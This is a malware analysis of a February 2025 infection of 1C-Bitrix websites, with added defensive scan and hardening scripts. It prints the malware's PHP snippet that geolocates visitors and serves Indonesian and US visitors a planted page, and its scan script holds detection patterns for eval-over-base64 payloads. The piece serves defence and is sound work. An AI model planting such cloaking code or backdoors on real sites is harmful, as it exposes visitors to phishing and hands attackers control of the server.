February virus on Bitrix

In early February 2025, a virus spread across the web that affected websites on the 1C-Bitrix platform. This malware embeds itself in project files, creates additional directories, and performs suspicious actions, including collecting user information and redirecting visitors to external resources. However, the signs of its activity point to a modification of existing attack methods rather than a completely new type of threat.

Main signs of infection

Creating new files and directories:

  • Unknown files appear in the `/aspro_regions/robots/` folder.
  • The files `robots.connections.php`, `wp-ver.php`, `index.php` are added to the root of the site.
  • Directories with random names appear, for example, `1a869/`, `a410f/`, containing substituted `index.php`.

Changes to the main `index.php`

  • Malicious code is embedded into the file before `header.php` is included.
  • The code uses obfuscation (`base64_encode`, `goto`), which makes it harder to detect.

Parsing infected files

1. `index.php`

The file contains hidden code that does the following:

- Gets the user's IP address.
- Makes a request to the `ip-api.com` service to determine the country.
- If the user is from **Indonesia or the United States**, it includes the `readme.html` file, which may contain a phishing page or a redirect.

Example of malicious code:

```php
// getUserIP() is not a PHP built-in: it is a helper defined elsewhere in the
// infected file that returns the visitor's address.
$ip = getUserIP();

// Look the address up in a public geolocation service.
$api_url = "http://ip-api.com/json/{$ip}";
$response = file_get_contents($api_url);
$data = json_decode($response, true);

// Visitors from Indonesia or the United States are served the planted
// readme.html instead of the site, and script execution stops there.
if ($data["countryCode"] === "ID" || $data["countryCode"] === "US") {
    ob_start();
    include "readme.html";
    $output = ob_get_clean();
    echo $output;
    die;
}
```

2. `wp-ver.php`

This file masquerades as a WordPress file (the `wp-` prefix in its name), but in fact it does the following:

- Creates hidden backdoor scripts.
- Runs remotely supplied commands via `eval()` or `base64_decode()`.
- Connects to external servers to transfer data.

3. `robots.connections.php`

- This file handles communication with external servers.
- It can be used to download new malicious scripts.
- It most often contains encrypted or obfuscated code.
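The indicators listed under "Main signs of infection" and in the three parsed files can be turned into a single triage scan of the document root. The script below is an added example for this write-up, not a 1C-Bitrix tool and not code from the original article: it reports the file names the article attributes to the infection, anything dropped into `/aspro_regions/robots/`, an `index.php` sitting in a five-character hex directory (the article's `1a869/`, `a410f/`), and PHP files whose contents show the `ip-api.com` lookup, `goto` obfuscation or `eval()` over `base64_decode()`. The output format (`TAG  path`) and the five-hex-character directory pattern are my assumptions drawn from the examples given.

```shell
#!/bin/sh
# scan_bitrix_iocs.sh: list files under a site root that match the indicators
# described in the write-up. Added example; not a 1C-Bitrix tool and not code
# from the original article. Each output line is "TAG  path".

scan_bitrix_iocs() {
    root="${1:-.}"

    # 1. File names the write-up attributes to the infection, anywhere in the tree.
    find "$root" -type f \( -name 'robots.connections.php' -o -name 'wp-ver.php' \) \
        | sed 's/^/NAME     /'

    # 2. Anything inside /aspro_regions/robots/: the article reports unknown
    #    files appearing there, so list them for manual review.
    if [ -d "$root/aspro_regions/robots" ]; then
        find "$root/aspro_regions/robots" -type f | sed 's/^/REVIEW   /'
    fi

    # 3. index.php placed in a directory whose name is five hex characters
    #    (assumed from the article's examples 1a869/ and a410f/).
    find "$root" -type f -name 'index.php' \
        | grep -E '/[0-9a-f]{5}/index\.php$' | sed 's/^/RANDDIR  /'

    # 4. Content indicators from the parsed files: the ip-api.com lookup in the
    #    root index.php, goto-based obfuscation, and eval() over base64_decode().
    find "$root" -type f -name '*.php' \
        -exec grep -lE 'ip-api\.com|goto [A-Za-z_]|eval *\( *base64_decode' {} + \
        | sed 's/^/CONTENT  /'
}

# Run directly: sh scan_bitrix_iocs.sh /var/www/site
if [ "$#" -gt 0 ]; then
    scan_bitrix_iocs "$1"
fi
```

The scan only lists candidates; the `CONTENT` hits in particular need a look by hand, since a legitimate module may also use `goto` or `base64_decode()`. Run it from a clean copy of the tree (or a backup) as well, so the diff between the two outputs shows what the infection added.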

The goal of the virus

- **Traffic interception** (redirects to phishing sites).
- **Theft of user data** (IP, browser, geolocation).
- **Using the server for attacks** (spam, DDoS, hosting phishing pages).

How to protect yourself?

1. Check files and directories

- Remove `robots.connections.php`, `wp-ver.php` and any unknown `index.php` files (for example, those in randomly named directories).
- Check the root `index.php` for malicious code.

2. Update CMS and modules

- Make sure you are using the latest version of Bitrix.

3. Restrict access to the server

- Disable execution of `eval()` in PHP configuration.
- Configure `.htaccess` to protect against the uploading of executable files.

4. Check access rights

- Disallow writing to `/bitrix/`, `/local/` and `/upload/`.

5. Perform an antivirus scan

- Use `AI-Bolit`, `Virusdie`, `ClamAV` to scan files.
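Steps 3 and 4 above (the `.htaccess` rule, the PHP configuration and the write restrictions) can be applied and checked with a small script. The following is an added example for this write-up, not a 1C-Bitrix tool and not code from the original article. It assumes Apache 2.4 with `.htaccess` overrides enabled and a web server process that runs as the owner of the site files. One caveat on step 3: `eval()` is a language construct, so PHP's `disable_functions` directive cannot switch it off; the check below therefore reports which of the functions that turn a decoded payload into an operating-system command (`exec`, `system`, `shell_exec`, `passthru`, `popen`, `proc_open`) a `php.ini` still leaves enabled, which is the part of that step the configuration can actually enforce. The marker comment `deny-php-in-uploads` and the function names are my own.

```shell
#!/bin/sh
# harden_bitrix.sh: apply the .htaccess and permission steps from the list above.
# Added example; not a 1C-Bitrix tool and not code from the original article.
# Assumes Apache 2.4 (AllowOverride enabled) and a web server running as the
# owner of the site files.

# Append an .htaccess rule to the uploads directory that refuses to serve any
# PHP-like file, so a script dropped there (a stray index.php, say) never runs.
# Idempotent: a second run finds the marker comment and does nothing.
write_upload_htaccess() {
    dir="$1"
    [ -d "$dir" ] || { echo "skip: $dir not found" >&2; return 0; }
    f="$dir/.htaccess"
    if [ -f "$f" ] && grep -q 'deny-php-in-uploads' "$f"; then
        return 0
    fi
    cat >> "$f" <<'EOF'
# deny-php-in-uploads: refuse to serve PHP-like files from this tree (Apache 2.4 syntax)
<FilesMatch "\.(php|phtml|phar|php[0-9])$">
    Require all denied
</FilesMatch>
EOF
}

# Remove write permission from a code directory so a compromised web process
# cannot plant or modify scripts there. Restore with "chmod -R u+w" before updates.
lock_code_dir() {
    dir="$1"
    [ -d "$dir" ] || { echo "skip: $dir not found" >&2; return 0; }
    chmod -R a-w "$dir"
}

harden_bitrix_site() {
    root="$1"
    write_upload_htaccess "$root/upload"
    lock_code_dir "$root/bitrix"
    lock_code_dir "$root/local"
}

# Print the command-execution functions that a php.ini leaves enabled
# (empty output means all of them are listed in disable_functions).
# eval is a language construct and cannot be disabled this way.
check_disable_functions() {
    ini="$1"
    enabled=$(grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$ini" \
        | tail -n 1 | cut -d= -f2- | tr -d '[:space:]')
    missing=""
    for fn in exec system shell_exec passthru popen proc_open; do
        case ",$enabled," in
            *",$fn,"*) ;;
            *) missing="$missing $fn" ;;
        esac
    done
    printf '%s\n' "${missing# }"
}

# Run directly: sh harden_bitrix.sh /var/www/site
if [ "$#" -gt 0 ]; then
    harden_bitrix_site "$1"
    echo "still enabled in /etc/php.ini: $(check_disable_functions /etc/php.ini)"
fi
```

`Require all denied` inside `FilesMatch` refuses the request before any handler runs, so it works the same with mod_php and PHP-FPM; on nginx the equivalent is a `location` rule, which this script does not write. The write lock is applied to `/bitrix/` and `/local/` only: Bitrix stores user uploads in `/upload/`, and it also writes its own cache and update files under `/bitrix/`, so after locking, re-enable write access on the subdirectories the site must still write to, and on the whole tree for the duration of a Bitrix update.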

Conclusion

This virus is a serious threat to Bitrix sites. It is important to regularly check files, monitor updates and use protective mechanisms. If your site is infected, it is recommended to immediately remove malicious files, conduct a security audit and strengthen protection.

9 February 2025 (Boudybuilder) Виталий Фантич
